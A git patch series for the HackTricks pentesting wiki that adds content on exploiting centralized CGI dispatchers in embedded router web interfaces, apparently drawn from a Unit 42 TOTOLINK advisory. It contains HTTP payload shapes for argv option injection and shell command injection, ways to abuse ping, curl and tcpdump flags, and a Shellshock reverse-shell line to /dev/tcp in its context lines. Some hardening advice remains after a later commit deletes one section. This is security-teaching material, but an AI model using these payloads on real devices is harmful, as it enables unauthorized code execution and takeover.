From 90afd5fcb11b6a8f4d0cac02e128294d2c05affb Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 1 Oct 2025 12:49:30 +0000 Subject: [PATCH 1/2] Add content from: TOTOLINK X6000R: Three New Vulnerabilities Uncovered --- .../pentesting-web/cgi.md | 44 ++++++++++++++++--- src/pentesting-web/command-injection.md | 41 ++++++++++++++++- src/welcome/hacktricks-values-and-faq.md | 3 +- 3 files changed, 79 insertions(+), 9 deletions(-) diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index a3625f877..7cc8bce59 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > run ``` -## **Proxy \(MitM to Web server requests\)** +## Centralized CGI dispatchers (single endpoint routing via selector parameters) -CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" +Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=` to route the request to an internal function. -As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. +Methodology to exploit these routers: + +- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher. +- Test unauthenticated reachability: some handlers forget auth checks and are directly callable. +- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. + +Generic exploit shapes: + +```http +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools +topicurl=¶m=-n + +# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; + +# 3) Validator bypass → arbitrary file write in file-touching handlers +topicurl=setWizardCfg&=/etc/init.d/S99rc +``` + +Detection and hardening: + +- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers. +- Flag parameters that begin with `-` (argv option injection attempts). +- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags. ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) @@ -80,8 +106,14 @@ curl -i --data-binary "" "http://jh2i.com:500 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +## **Proxy \(MitM to Web server requests\)** + +CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com" + +As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: <IP_attacker>:<PORT>**" and if the server performs any request during the session. You will be able to capture each request made by the server. + +## **References** + +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 8529062f6..e84179e05 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -158,6 +158,44 @@ execFile('/usr/bin/do-something', [ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). +### Argument/Option injection via leading hyphen (argv, no shell metacharacters) + +Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. + +Typical places where this appears: + +- Embedded web UIs/CGI handlers that build commands like `ping `, `tcpdump -i -w `, `curl `, etc. +- Centralized CGI routers (e.g., `/cgi-bin/.cgi` with a selector parameter like `topicurl=`) where multiple handlers reuse the same weak validator. + +What to try: + +- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool. +- Abuse flags that change behavior or write files, for example: + - `ping`: `-f`/`-c 100000` to stress the device (DoS) + - `curl`: `-o /tmp/x` to write arbitrary paths, `-K ` to load attacker-controlled config + - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers +- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place. + +Generic PoC shapes against centralized CGI dispatchers: + +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# Flip options in a downstream tool via argv injection +topicurl=¶m=-n + +# Unauthenticated RCE when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; +``` + +Hardening and detection: + +- Reject inputs that start with `-` and enforce strict allowlists and types (IP, MAC, SSID, etc.). +- Always pass user data after a literal `--` where supported and never allow extra flags from user-controlled fields. +- Prefer safe APIs (no shell); for wrappers, construct fixed argv templates with no user-controlled flags. +- Look for unauthenticated hits to centralized CGI endpoints (e.g., `/cgi-bin/cstecgi.cgi`) with selector parameters and values beginning with `-`. + ## Brute-Force Detection List @@ -173,5 +211,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) -{{#include ../banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} - From 5b9ec7fcd6a62609cca351cf6c8a686272ff11d5 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sat, 4 Oct 2025 11:06:35 +0200 Subject: [PATCH 2/2] Update command-injection.md --- src/pentesting-web/command-injection.md | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index e84179e05..d3e593336 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -189,13 +189,6 @@ topicurl=¶m=-n topicurl=setEasyMeshAgentCfg&agentName=;id; ``` -Hardening and detection: - -- Reject inputs that start with `-` and enforce strict allowlists and types (IP, MAC, SSID, etc.). -- Always pass user data after a literal `--` where supported and never allow extra flags from user-controlled fields. -- Prefer safe APIs (no shell); for wrappers, construct fixed argv templates with no user-controlled flags. -- Look for unauthenticated hits to centralized CGI endpoints (e.g., `/cgi-bin/cstecgi.cgi`) with selector parameters and values beginning with `-`. - ## Brute-Force Detection List @@ -213,4 +206,4 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) -{{#include ../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../banners/hacktricks-training.md}}